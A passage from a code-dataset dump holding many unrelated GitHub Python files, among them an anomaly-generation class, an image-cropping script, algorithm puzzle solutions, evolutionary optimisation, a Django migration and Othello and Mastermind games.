amplitude)).fit_transform(pattern.reshape(-1, 1)).reshape(-1)\n return scaled\n\n sine = anomaly_protocol.base_oscillation\n subsequence = sinusoid(sine.timeseries[anomaly_protocol.start:anomaly_protocol.end], self.sinusoid_k, sine.amplitude)\n anomaly_protocol.subsequences.append(subsequence)\n elif anomaly_protocol.base_oscillation_kind == BaseOscillationKind.RandomWalk:\n self.logger.warn_false_combination(self.__class__.__name__, anomaly_protocol.base_oscillation_kind.name)\n elif anomaly_protocol.base_oscillation_kind == BaseOscillationKind.CylinderBellFunnel:\n cbf = anomaly_protocol.base_oscillation\n subsequence = cbf.generate_only_base(variance_pattern_length=cbf.variance_pattern_length * self.cbf_pattern_factor)[anomaly_protocol.start:anomaly_protocol.end]\n anomaly_protocol.subsequences.append(subsequence)\n elif anomaly_protocol.base_oscillation_kind == BaseOscillationKind.ECG:\n ecg = anomaly_protocol.base_oscillation\n length = anomaly_protocol.end - anomaly_protocol.start\n window = int(length * 0.05)\n\n for slide in range(-3, 3):\n start = ecg.timeseries[anomaly_protocol.start+slide:anomaly_protocol.start+window]\n if np.argmax(start) == 0:\n break\n else:\n slide = 0\n\n subsequence = ecg.timeseries[anomaly_protocol.start + slide:anomaly_protocol.end + slide][::-1]\n anomaly_protocol.subsequences.append(subsequence)\n else:\n self.logger.warn_false_combination(self.__class__.__name__, anomaly_protocol.base_oscillation_kind.name)\n return anomaly_protocol\n\n @staticmethod\n def get_parameter_class() -> Type[AnomalyPatternParameters]:\n return AnomalyPatternParameters\n\n def __init__(self, parameters: AnomalyPatternParameters):\n super().__init__()\n self.sinusoid_k = parameters.sinusoid_k\n self.cbf_pattern_factor = parameters.cbf_pattern_factor\n","repo_name":"ramonmassip/gutentag","sub_path":"gutenTAG/anomalies/types/pattern.py","file_name":"pattern.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"66"} +{"seq_id":"9407660595","text":"from wand.image import Image as wi\nfrom PIL import ImageOps\nfrom PIL import Image\nimport os\nimport pip\nimport sys\n\ndef pdf2jpg(filename,source):\n\n pdf = wi(filename=source+'\\\\'+filename+'.pdf', resolution=300)\n pdfImg = pdf.convert('jpeg')\n i=1\n name=str(filename).split('.')[0]\n\n for img in pdfImg.sequence:\n page = wi(image=img)\n page.save(filename=source+'\\\\'+name+'--'+str(i)+'.jpg')\n i+=1\n\ndef cropImg(fileName,filetype,source, dest):\n\n if filetype == 'jpg':\n img = Image.open(source+'\\\\'+fileName+'.'+filetype)\n # elif filetype == 'pdf':\n # img = Image.open('wholeImg/'+fileName+'.jpg')\n else:\n return\n\n xdimSize = img.size[0]\n ydimSize = img.size[1]\n\n xStartTL = -1\n xStartBL = -1\n xStartMid = -1\n yStartTop = 0\n xEndTR = xdimSize\n xEndBR = xdimSize\n xEndMid = xdimSize\n yEndL = ydimSize\n yEndM = ydimSize\n yEndR = ydimSize\n\n\n y=0\n tol01=0\n while y <= ydimSize and yEndM == ydimSize:\n r,g,b = img.getpixel((int(xdimSize/2),y)) \n if(r >= 254 and g >= 254 and b>= 254):\n tol01+=1\n if tol01==50:\n yEndM = y-50\n y+=1\n y=0\n tol01=0\n while y <= ydimSize and yEndL == ydimSize:\n r,g,b = img.getpixel((int(xdimSize/4),y)) \n if(r >= 254 and g >= 254 and b>= 254):\n tol01+=1\n if tol01==50:\n yEndL = y-50\n y+=1\n y=0\n tol01=0\n while y <= ydimSize and yEndR == ydimSize:\n r,g,b = img.getpixel((int(3*xdimSize/4),y)) \n if(r >= 254 and g >= 254 and b>= 254):\n tol01+=1\n if tol01==50:\n yEndR = y-50\n y+=1\n\n yEnd=max(yEndL,yEndR,yEndM)\n\n\n x=0\n tol1 = 0\n while x < xdimSize and xEndTR == xdimSize:\n r,g,b = img.getpixel((x,0))\n if(xStartTL ==-1 and ( r < 254 or g< 254 or b< 254)):\n xStartTL = x\n if(xStartTL != -1 and r >= 254 and g >= 254 and b>= 254):\n tol1+=1\n if(tol1 == 50):\n xEndTR = x-50\n x+=1\n\n x = 0\n tol2 = 0\n while x < xdimSize and xEndBR == xdimSize:\n r,g,b = img.getpixel((x,yEnd-70))\n if(xStartBL ==-1 and ( r < 254 or g< 254 or b< 254)):\n xStartBL = x\n if(xStartTL != -1 and r >= 254 and g >= 254 and b>= 254):\n tol2+=1\n if(tol2 == 50):\n xEndBR = x-50\n \n x+=1\n x = 0\n tol3 = 0\n while x < xdimSize and xEndMid == xdimSize:\n r,g,b = img.getpixel((x,int(yEnd/2)))\n if(xStartMid ==-1 and ( r < 254 or g< 254 or b< 254)):\n xStartMid = x\n if(xStartMid != -1 and r >= 254 and g >= 254 and b>= 254):\n tol3+=1\n if(tol3 == 50):\n xEndMid = x-50\n \n x+=1\n\n xStart = min(xStartBL,xStartTL, xStartMid)\n xEnd = max(xEndBR,xEndTR,xEndMid)\n\n area=(xStart,yStartTop,xEnd,yEnd)\n croppedImg = img.crop(area)\n croppedImg.save(dest+'\\\\'+fileName+'.jpg')\n\n# def install(package):\n# if hasattr(pip, 'main'):\n# pip.main(['install', package])\n# else:\n# pip.main(['install', package]) \n\ndef main():\n\n # only need to run once to generate the directory of jpg files\n # pdf2jpg('keith.pdf')\n print(\"USAGE:\\n python cropImg.py C:\\\\path\\\\souceDirectory C:\\\\path\\\\destinationDirectory\\nDo not include \\\\ after source/destination \")\n\n source = sys.argv[1]\n dest = sys.argv[2]\n\n print(source,dest)\n\n for fn in os.listdir(source):\n filename = str(fn).split('.')[0]\n filetype = str(fn).split('.')[1]\n name = filename.split('\\\\')[-1]\n if filetype=='pdf':\n pdf2jpg(name,source)\n\n for fn in os.listdir(source):\n filename = str(fn).split('.')[0]\n filetype = str(fn).split('.')[1]\n name = filename.split('\\\\')[-1]\n if filetype=='jpg':\n cropImg(name,filetype,source,dest)\n \n # for fn in os.listdir('wholeImg'):\n # filename = str(fn).split('.')[0]\n # # filetype = str(fn).split('.')[1]\n # cropImg(filename,'pdf')\n\n\n # cropImg('keith--6','pdf')\n\n\n\n\nif __name__ == \"__main__\":\n # install('argh')\n main()\n\n\n","repo_name":"kkamons/CropImageInPDF","sub_path":"cropImg.py","file_name":"cropImg.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72376022290","text":"from sys import argv\nfrom os.path import exists # exists command returns True if a file exists, based on name in string as argument\n\nscript, from_file, to_file = argv \n\nprint(f\"Copying from {from_file} to {to_file}\")\n\nin_file = open(from_file)\nindata = in_file.read()\n\n#len () function gets length of string and returns as a number \nprint(f\"The input file is {len(indata)} bytes long\")\n\n# will return as true or false (in this case false, to_file is created in terminal)\nprint(f\"Does the output file exist? {exists(to_file)}\")\nprint(\"Ready, hit RETURN to continue, CTRL-C to abort.\")\ninput()\n\nout_file = open(to_file, 'w')\nout_file.write(indata)\n\nprint(\"Alright, all done.\")\n\n# good practice to use close() method to close all files \nout_file.close()\nin_file.close() ","repo_name":"eunice-pereira/Python-practice","sub_path":"ex17.py","file_name":"ex17.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3539266889","text":"import requests\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom datetime import datetime\nimport os\n\ncurrent_datetime = datetime.now()\nversion = requests.get('https://pastebin.com/raw/YDyNZ5Py').text\nyear = current_datetime.year\n\n\nclass AboutDialog(QDialog):\n def __init__(self, *args, **kwargs):\n super(AboutDialog, self).__init__(*args, **kwargs)\n\n QBtn = QDialogButtonBox.Ok\n self.buttonbox = QDialogButtonBox(QBtn)\n self.buttonbox.accepted.connect(self.accept)\n self.buttonbox.rejected.connect(self.reject)\n self.setWindowFlags(Qt.FramelessWindowHint)\n\n layout = QVBoxLayout()\n\n title = QLabel(\"SolenoxBrowser\")\n font = title.font()\n font.setPointSize(20)\n title.setFont(QFont('Segoe UI', 20))\n font.setBold(True)\n\n layout.addWidget(title)\n\n logo = QLabel()\n logo.setPixmap(QPixmap(os.path.join('data/images', 'logo.png')))\n layout.addWidget(logo)\n\n layout.addWidget(QLabel(f\"Version {version}\"))\n layout.addWidget(QLabel(f\"Copyright {year} SolenoxProject\"))\n\n for i in range(0, layout.count()):\n layout.itemAt(i).setAlignment(Qt.AlignHCenter)\n\n layout.addWidget(self.buttonbox)\n\n self.setLayout(layout)\n","repo_name":"lolkekdev/SolenoxBrowser","sub_path":"src/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"11994335080","text":"import sys, pprint\ninput = sys.stdin.readline\n\n\ndef tornado(r, c, direction):\n global sand_out\n dr, dc = move_direction[direction] # 진행방향\n dr2, dc2 = move_direction[(direction+1)%4] # 진행방향의 왼쪽\n dr3, dc3 = move_direction[(direction+3)%4] # 진행방향의 오른쪽\n spread_sand_list = [\n (r+dr2, c+dc2, 0.07), (r+dr+dr2, c+dc+dc2, 0.1), (r-dr+dr2, c-dc+dc2, 0.01), (r+2*dr2, c+2*dc2, 0.02),\n (r+dr3, c+dc3, 0.07), (r+dr+dr3, c+dc+dc3, 0.1), (r-dr+dr3, c-dc+dc3, 0.01), (r+2*dr3, c+2*dc3, 0.02),\n (r+2*dr, c+2*dc, 0.05)\n ] # 흩날리는 지역과 비율\n \n # 흩날릴 모래양 \n now_sand = sands[r][c]\n alpha_sand = sands[r][c]\n sands[r][c] = 0\n \n # 비율이 적힌 칸에 대한 계산\n for tr, tc, ratio in spread_sand_list:\n alpha_sand -= int(now_sand * ratio)\n if 0 <= tr < N and 0 <= tc < N:\n sands[tr][tc] += int(now_sand * ratio)\n else:\n sand_out += int(now_sand * ratio)\n \n # alpha칸에 대한 계산\n if 0 <= r+dr < N and 0 <= c+dc < N:\n sands[r+dr][c+dc] += alpha_sand\n else:\n sand_out += alpha_sand\n\nN = int(input())\nsands = [list(map(int, input().split())) for _ in range(N)]\nstart = (N//2, N//2)\nr, c = start\nmove_direction = [(0, -1), (1, 0), (0, 1), (-1, 0)] # 좌우하상\nmove_distance = 1 # 움직이는 거리, 방향전환 2번마다 한칸씩 더 움직임\nmove_flag = True\nnow_move_direction = 0\nsand_out = 0\ncnt = 1\nwhile cnt < N**2-1:\n for i in range(move_distance):\n cnt += 1\n dr, dc = move_direction[now_move_direction]\n r += dr\n c += dc\n if not(0 <= r < N and 0 <= c < N):\n continue\n tornado(r, c, now_move_direction)\n # 두번의 방향전환 후에 이동거리가 하나씩 증가 \n if move_flag:\n move_flag = False\n else:\n move_distance += 1\n move_flag = True\n now_move_direction = (now_move_direction + 1)%4\n \nprint(sand_out)","repo_name":"okdongdong/Algorithm_Study","sub_path":"Python/BOJ/4_Gold/20057.py","file_name":"20057.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21660486932","text":"#User function Template for python3\n\nclass Solution:\n def nextPermutation(self, N, arr):\n # code here\n if N<=2:\n arr[0],arr[1] = arr[1],arr[0]\n return arr\n \n pointer = N-2\n while pointer>=0 and arr[pointer+1]<=arr[pointer]:\n pointer-=1\n \n if pointer == -1:\n return arr[::-1]\n \n \n for x in range(N-1,pointer,-1):\n if arr[x]>arr[pointer]:\n arr[x],arr[pointer]=arr[pointer],arr[x]\n break\n \n arr[pointer+1:]=reversed(arr[pointer+1:])\n return arr\n#{ \n # Driver Code Starts\n#Initial Template for Python 3\n\nif __name__ == '__main__':\n t = int(input())\n for _ in range(t):\n N = int(input())\n arr = input().split()\n for i in range(N):\n arr[i] = int(arr[i])\n \n ob = Solution()\n ans = ob.nextPermutation(N, arr)\n for i in range(N):\n print(ans[i],end=\" \")\n print()\n# } Driver Code Ends","repo_name":"Priya1202/DSA","sub_path":"Next Permutation - GFG/next-permutation.py","file_name":"next-permutation.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16650165566","text":"from enum import Enum\nimport csv\n\ntimeelapsedneararena = 5.0\n\n\nclass SaveMode(Enum):\n FALSE = 0\n TIMELINE = 1\n STAT = 2\n STEADYSTAT = 3\n\n\nclass Item:\n # 4 digits\n acceleration: list\n # 4 digits\n correlation: list\n # 4 digits\n distancebetweenunits: list\n # 3 digits\n distancebetweenneighbors: list\n # 1 digits\n collisionratio: float\n # 8 digits\n velocity: list\n # 3 digits\n CoM: list\n\n def __init__(self, acceleration=[0.0 for i in range(4)],\n correlation=[0.0 for i in range(4)],\n distancebetweenunits=[0.0 for i in range(4)],\n distancebetweenneighbors=[0.0 for i in range(3)],\n collisionratio=0.0,\n velocity=[0.0 for i in range(8)],\n CoM=[0.0 for i in range(3)]):\n\n self.acceleration = acceleration\n self.correlation = correlation\n self.distancebetweenunits = distancebetweenunits\n self.distancebetweenneighbors = distancebetweenneighbors\n self.collisionratio = collisionratio\n self.velocity = velocity\n self.CoM = CoM\n pass\n\n def reset(self):\n self.acceleration = [0.0 for i in range(4)]\n self.correlation = [0.0 for i in range(4)]\n self.distancebetweenunits = [0.0 for i in range(4)]\n self.distancebetweenneighbors = [0.0 for i in range(3)]\n self.collisionratio = 0.0\n self.velocity = [0.0 for i in range(8)]\n self.CoM = [0.0 for i in range(3)]\n\n\nclass StatUtil:\n elapsedtime: float\n startofsteadystate: float\n savemode: SaveMode\n sum: Item\n stdev: Item\n\n def __init__(self, elpasedtime=0.0, startofsteadystate=0.0,\n savemode=SaveMode.FALSE, sum=Item(), stdev=Item()):\n self.elapsedtime = elpasedtime\n self.startofsteadystate = startofsteadystate\n self.savemode = savemode\n self.sum = sum\n self.stdev = stdev\n pass\n\n def reset(self):\n self.sum.reset()\n self.stdev.reset()\n pass\n\n def initmodelspecificstatus(self, currentdirectory: str):\n\n f_distancefromarena = open(currentdirectory+'/distance_from_arena.csv', 'w+')\n f_clusterdependentcorrelation = open(currentdirectory+'/cluster_dependent_correlation.csv', 'w+')\n f_clusterparameters = open(currentdirectory+'/cluster_parameters.csv', 'w+')\n\n # preparations\n title_distancefromarena = [\n 'time(s)',\n 'distance_from_arena_avg(cm)',\n 'distance_from_arena_stdev(cm)',\n 'distance_from_arena_min(cm)',\n 'distance_from_arena_max(cm)',\n 'number_of_agents_outside']\n title_clusterdependentcorrelation = [\n 'time(s)',\n 'cluster_dependent_correlation_avg',\n 'cluster_dependent_correlation_stdev',\n 'cluster_dependent_correlation_min',\n 'cluster_dependent_correlation_max']\n title_clusterparameters = [\n 'time_(s)',\n 'min_cluster_size',\n 'max_cluster_size',\n 'agents_not_in_cluster']\n\n if self.savemode is SaveMode.STAT or self.savemode is not SaveMode.STEADYSTAT:\n csvwriter_distancefromarena = csv.writer(\n f_distancefromarena)\n csvwriter_distancefromarena.writerow(\n title_distancefromarena)\n\n csvwriter_clusterdependentcorrelation = csv.writer(\n f_clusterdependentcorrelation)\n csvwriter_clusterdependentcorrelation.writerow(\n title_clusterdependentcorrelation)\n csvwriter_clusterparameters = csv.writer(\n f_clusterparameters)\n csvwriter_clusterparameters.writerow(\n title_clusterparameters)\n\n if self.savemode is SaveMode.STAT or self.savemode is SaveMode.STEADYSTAT:\n f_distancefromarena_stdev = open(currentdirectory+'/distance_from_arena_stdev.csv', 'w+')\n f_clusterdependentcorrelation_stdev = open(currentdirectory+'/cluster_dependent_correlation_stdev.csv', 'w+')\n f_clusterparameters_stdev = open(currentdirectory+'/cluster_parameters_stdev.csv', 'w+')\n\n # preparations\n title_distancefromarena_stdev = [\n 'time_elapsed_near_arena_(s)',\n 'distance_from_arena_avg_(cm)',\n 'distance_from_arena_stdev_(cm)',\n 'distance_from_arena_min_(cm)',\n 'distance_from_arena_max_(cm)',\n 'number_of_agents_outside']\n title_clusterdependentcorrelation_stdev = [\n 'time_(s)',\n 'cluster_dependent_correlation_avg',\n 'cluster_dependent_correlation_stdev',\n 'cluster_dependent_correlation_min',\n 'cluster_dependent_correlation_max']\n title_clusterparameters_stdev = [\n 'time_(s)', 'min_cluster_size',\n 'max_cluster_size',\n 'agents_not_in_cluster']\n\n csvwriter_distancefromarena_stdev = csv.writer(\n f_distancefromarena_stdev)\n csvwriter_distancefromarena_stdev.writerow(\n title_distancefromarena_stdev)\n\n csvwriter_clusterdependentcorrelation_stdev = csv.writer(\n f_clusterdependentcorrelation_stdev)\n csvwriter_clusterdependentcorrelation_stdev.writerow(\n title_clusterdependentcorrelation_stdev)\n\n csvwriter_clusterparameters_stdev = csv.writer(\n f_clusterparameters_stdev)\n csvwriter_clusterparameters_stdev.writerow(\n title_clusterparameters_stdev)\n\n # TODO: how to deal with the global variable 'TimeElapsedNearArena'? This is a question\n\n global timeelapsedneararena\n timeelapsedneararena = 0.0\n\n","repo_name":"htlee6/flockrobots","sub_path":"utils/StatsticUtils/stat.py","file_name":"stat.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21230942349","text":"import warnings\n\nimport numpy as np\nimport pyvista as pv\nimport vtk\n\nfrom pyvista import PolyData, UnstructuredGrid\nfrom typing import List\n\ntry:\n from typing import Literal\nexcept ImportError:\n from typing_extensions import Literal\n\nfrom .reconstruct_mesh import merge_mesh\n\n\ndef three_d_pick(\n mesh: PolyData or UnstructuredGrid,\n key: str = \"groups\",\n pick_method: Literal[\"rectangle\", \"box\"] = \"rectangle\",\n invert: bool = False,\n merge: bool = True,\n) -> List[PolyData or UnstructuredGrid] or UnstructuredGrid:\n \"\"\"\n Pick the interested part of a reconstructed 3D mesh by interactive approach.\n Args:\n mesh: Reconstructed 3D mesh.\n key: The key under which are the labels.\n pick_method: Pick the interested part of a mesh using a 2D rectangle widget or 3D box widget. Available `pick_method` are:\n * `'rectangle'`: Pick the interested part of a mesh using a 2D rectangle widget. Multiple meshes can be generated at the same time.\n * `'box'`: Pick the interested part of a mesh using a 3D box widget. Only one mesh can be generated.\n invert: Flag on whether to flip/invert the pick.\n merge: Flag on whether to merge all picked meshes.\n Returns:\n A list of meshes or a merged mesh. If merge is True, return a merged mesh; else return a list of meshes.\n \"\"\"\n\n if isinstance(mesh, UnstructuredGrid) is False:\n warnings.warn(\"The mesh should be a pyvista.UnstructuredGrid object.\")\n mesh = mesh.cast_to_unstructured_grid()\n\n p = pv.Plotter()\n\n if pick_method == \"rectangle\":\n # Clip a mesh using a 2D rectangle widget.\n p.add_mesh(mesh, scalars=f\"{key}_rgba\", rgba=True)\n picked_meshes, invert_meshes, legend = [], [], []\n\n def split_mesh(original_mesh):\n \"\"\"Adds a new mesh to the plotter each time cells are picked, and\n removes them from the original mesh\"\"\"\n\n # if nothing selected\n if not original_mesh.n_cells:\n return\n\n # remove the picked cells from main grid\n ghost_cells = np.zeros(mesh.n_cells, np.uint8)\n ghost_cells[original_mesh[\"orig_extract_id\"]] = 1\n mesh.cell_data[vtk.vtkDataSetAttributes.GhostArrayName()] = ghost_cells\n mesh.RemoveGhostCells()\n\n # add the selected mesh this to the main plotter\n color = np.random.random(3)\n legend.append([\"picked mesh %d\" % len(picked_meshes), color])\n p.add_mesh(original_mesh, color=color)\n p.add_legend(legend)\n\n # track the picked meshes and label them\n original_mesh[\"picked_index\"] = np.ones(original_mesh.n_points) * len(\n picked_meshes\n )\n picked_meshes.append(original_mesh)\n invert_meshes.append(mesh)\n\n p.enable_cell_picking(\n mesh=mesh,\n callback=split_mesh,\n show=False,\n font_size=12,\n show_message=\"Press `r` to enable retangle based selection. Press `r` again to turn it off. \\n\"\n \"Press `q` to exit the interactive window. \",\n )\n p.show()\n picked_meshes = [invert_meshes[0]] if invert else picked_meshes\n else:\n # Clip a mesh using a 3D box widget.\n p.add_mesh_clip_box(mesh, invert=invert, scalars=f\"{key}_rgba\", rgba=True)\n p.show()\n picked_meshes = p.box_clipped_meshes\n\n # plot final picked meshes\n pv.plot(picked_meshes)\n\n if merge:\n return merge_mesh(picked_meshes) if len(picked_meshes) > 1 else picked_meshes[0]\n else:\n return picked_meshes\n","repo_name":"chen-zhan/stDrosophila-release-1","sub_path":"stDrosophila/tools/three_d_reconstruction/picking.py","file_name":"picking.py","file_ext":"py","file_size_in_byte":3672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6002656050","text":"from benchmark_functions import benchmark_functions\nfrom EvolutionaryAlgorithm import *\n\nimport matplotlib.pyplot as plt\n\nfor function in benchmark_functions:\n EA = EvolutionaryAlgorithm(benchmark_functions[function], 1000, 1000, 30)\n\n plt.figure()\n plt.title(function)\n\n adaptiveES = AdaptiveEvolutionStrategies(EA)\n history = adaptiveES.run(1000, 10)\n print('Adaptive ES (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'r-', label='Adaptive ES')\n\n selfAdaptiveES = SelfAdaptiveEvolutionStrategies(EA)\n history = selfAdaptiveES.run(1000, 10)\n print('Self-Adaptive ES (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'g-', label='Self-adaptive ES')\n\n DE = DifferentialEvolution(EA)\n history = DE.run(1000, 10)\n print('DE (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'b-', label='DE')\n\n pso = PSO(EA)\n history = pso.run(1000, 10)\n print('PSO (' + function + ')', history['answer_dist'])\n plt.plot(history['best_fitness'], 'k-', label='PSO')\n\n print('-------------------------------')\n\n plt.legend()\n\nplt.show()","repo_name":"mohamad-qodosi/Evoluationary_computing","sub_path":"test_algirithms.py","file_name":"test_algirithms.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28442818907","text":"import random\r\n\r\n\r\ndef create_code(c_letters, length):\r\n '''\r\n (str, int)---> list\r\n Given a str and a size (an int) return a list of length size of single\r\n character strs comprised of the characters in the given str.\r\n '''\r\n newlist = []\r\n for i in range(0, length):\r\n letter = random.choice(c_letters)\r\n newlist.append(letter)\r\n return newlist\r\n\r\n\r\ndef valid(code_list, valid_chars, length):\r\n '''\r\n (list, str, int) ---> bool\r\n Given a list of single character strs, a str and a int that\r\n is the length of the guess, return True if every character,\r\n is in the given str and the guess is the correct length.\r\n '''\r\n wordcode = ''\r\n for i in code_list:\r\n wordcode = wordcode + i\r\n if len(wordcode) > length:\r\n return False\r\n else:\r\n for i in code_list:\r\n if valid_chars.find(i) == -1:\r\n return False\r\n return True\r\n\r\n\r\ndef remove_fully_correct(code_list, guess_list):\r\n '''\r\n (list, list) ---> list\r\n Given two lists of single character strs return a new list that is the\r\n result of removing from the first list all chars that are the same and\r\n in the same position in the second list. Both lists have\r\n the same length.\r\n '''\r\n newlist = []\r\n index = 0\r\n while index < len(code_list) and index < len(guess_list):\r\n if code_list[index] == guess_list[index]:\r\n newlist.append(code_list[index])\r\n index = index + 1\r\n return newlist\r\n\r\n\r\ndef find_fully_correct(code_list, guess_list):\r\n '''\r\n (list, list) ---> list\r\n Given the answer code (a list) and the guess (a list) return a list\r\n containing a 'b' for each correctly positioned colour in the guess.\r\n '''\r\n newlist = []\r\n c_list = remove_fully_correct(code_list, guess_list)\r\n c_word = ''\r\n for i in code_list:\r\n c_word = c_word + i\r\n newlist = []\r\n for item in c_list:\r\n count = c_word.count(item)\r\n if count >= 1:\r\n newlist.append('b')\r\n return newlist\r\n\r\n\r\ndef find_colour_correct(clist, glist1):\r\n '''\r\n (list, list) ---> list\r\n Given two lists of single character strs return a list of 'w's\r\n where the number of 'w's is equal to the number of str in the\r\n second list that have the same value as str in the first list\r\n but different position. Only one 'w' is returned for each str in\r\n the first list.\r\n '''\r\n glist = []\r\n for s in glist1:\r\n glist.append(s)\r\n index = 0\r\n while index < len(clist) and index < len(glist):\r\n if clist[index] == glist[index]:\r\n clist = clist[:index] + clist[index+1:]\r\n glist = glist[:index] + glist[index+1:]\r\n index = -1\r\n index = index + 1\r\n g_word = ''\r\n for item in glist:\r\n g_word = g_word + item\r\n newlist = []\r\n for i in clist:\r\n count = g_word.count(i)\r\n if count >= 1:\r\n newlist.append('w')\r\n glist.remove(i)\r\n g_word = ''\r\n for let in glist:\r\n g_word = g_word + let\r\n return newlist\r\n\r\ndef print_game(glist1, clist2):\r\n '''\r\n (list, list) ---> None\r\n Given two lists of lists of single character strs print to the display\r\n the headers Guess and Clue separated by a tab. Next, print\r\n corresponding sublists of the given lists. Each character in the\r\n sublists should be printed, separated by spaces. Each pair of sublists\r\n should be separated by a tab and on a separate line\r\n '''\r\n print ('Guesses \\tClues')\r\n index = 0\r\n while index <= len(clist2) and index < len(glist1):\r\n gstring = ''\r\n for i in glist1[index]:\r\n gstring = gstring + i + ' '\r\n cstring = ''\r\n for item in clist2[index]:\r\n cstring = cstring + item + ' '\r\n print (gstring,'\\t', cstring)\r\n index = index + 1","repo_name":"MUsamatariq27/mini-Projects","sub_path":"mastermindGame/mastermind.py","file_name":"mastermind.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34039014132","text":"\"\"\"List of prime numbers generator.\"\"\"\n\"\"\"ENTER YOUR SOLUTION HERE!\"\"\"\n\ndef primes(number_of_primes):\n if number_of_primes <= 0:\n raise ValueError\n\n list = []\n num = 2\n while len(list) < number_of_primes:\n if isPrime(num):\n list.append(num)\n num += 1\n return list\n\ndef isPrime(n):\n if n == 2:\n return True\n for i in range(2, n):\n if n % i == 0:\n return False\n return True\n","repo_name":"KCL-SEG/list-of-primes-v2-Cassini-17","sub_path":"primes.py","file_name":"primes.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33243306891","text":"# encapsulando atributos con __\nclass Coche():\n def __init__(self):\n self.__largoChasis = 250\n self.__anchoChasis = 120\n self.__ruedas = 4\n self.__enMarcha = False\n\n def arrancar(self, arrancamos):\n self.__enMarcha = arrancamos\n if self.__enMarcha:\n return \"EL COCHE ESTÁ EN MARCHA\"\n else:\n return \"EL COCHE ESTÁ PARADO\"\n\n def estado(self):\n print(\"El coche tiene: \", self.__ruedas, \" ruedas\", \" un ancho de: \",\n self.__anchoChasis, \" y un largo de: \", self.__largoChasis)\n\n\nmiCoche = Coche()\nprint(miCoche.arrancar(False))\n# aqui vemos que no puede modificar el atributo\nmiCoche.__ruedas = 5\nmiCoche.estado()\n","repo_name":"Jorgefebres/python-tut-pildoras","sub_path":"encapsulamiento.py","file_name":"encapsulamiento.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71677984530","text":"# Created manually by mschrimpf to address a change that happened at some point before\n# https://github.com/brain-score/brain-score.web/pull/15 where the database model field `identifier` was renamed\n# (or originally named) to `name`.\n# Also address changed help text for `user.is_staff` in https://github.com/brain-score/brain-score.web/pull/69.\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [\n ('benchmarks', '0003_user_display_name'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='model',\n old_name='identifier',\n new_name='name',\n ),\n migrations.AlterField(\n model_name='model',\n name='name',\n field=models.CharField(max_length=200),\n ),\n migrations.AlterField(\n model_name='user',\n name='is_staff',\n field=models.BooleanField(default=False, help_text='Designates whether the user is a staff member.',\n verbose_name='staff status'),\n ),\n ]\n","repo_name":"brain-score/brain-score.web","sub_path":"benchmarks/migrations/0004_model_identifier_name.py","file_name":"0004_model_identifier_name.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"36624418856","text":"import pygame \n\nclass Gui:\n def __init__(self):\n # Initialize Pygame\n pygame.init()\n # Colors\n self.BLACK = (0, 0, 0)\n self.WHITE = (255, 255, 255)\n self.GREEN = (60, 179, 113)\n self.YELLOW = (255, 255, 153)\n # Measurements for board spaces and disk pieces\n self.WIDTH = 55\n self.HEIGHT = 55\n self.MARGIN = 5\n self.RADIUS = 20\n self.SCREEN_SIZE = (485, 485)\n self.screen = pygame.display.set_mode(self.SCREEN_SIZE)\n pygame.display.set_caption(\"Othello Game\")\n \n def show_screen(self, state):\n \"\"\"Display the initial board.\"\"\"\n node = lambda x, y: \"%s\" % (state.board.get((x, y)))\n coordinates = [[node(x, y) for x in range(8)] for y in range(8)]\n self.screen.fill(self.BLACK)\n self.draw_board(coordinates)\n # Update the screen\n pygame.display.flip()\n\n def draw_board(self, board):\n for row in range(8):\n for col in range(8):\n x_coord = (self.MARGIN + self.WIDTH) * row + self.MARGIN\n y_coord = (self.MARGIN + self.HEIGHT) * col + self.MARGIN\n pygame.draw.rect(self.screen, self.GREEN, [x_coord, y_coord, self.WIDTH, self.HEIGHT])\n player = board[row][col]\n if player != None:\n self.draw_disk(player, row, col)\n\n def draw_disk(self, player, x, y):\n x_coord = (self.MARGIN + self.WIDTH) * x + self.MARGIN + 25\n y_coord = (self.MARGIN + self.HEIGHT) * y + self.MARGIN + 25\n if player == 'B':\n pygame.draw.circle(self.screen, self.BLACK, (x_coord, y_coord), self.RADIUS)\n elif player == 'W':\n pygame.draw.circle(self.screen, self.WHITE, (x_coord, y_coord), self.RADIUS)\n\n def get_mouse_event(self):\n \"\"\"Detect user clicks.\"\"\"\n done = False\n # Loop until user clicks close button\n while not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n elif event.type == 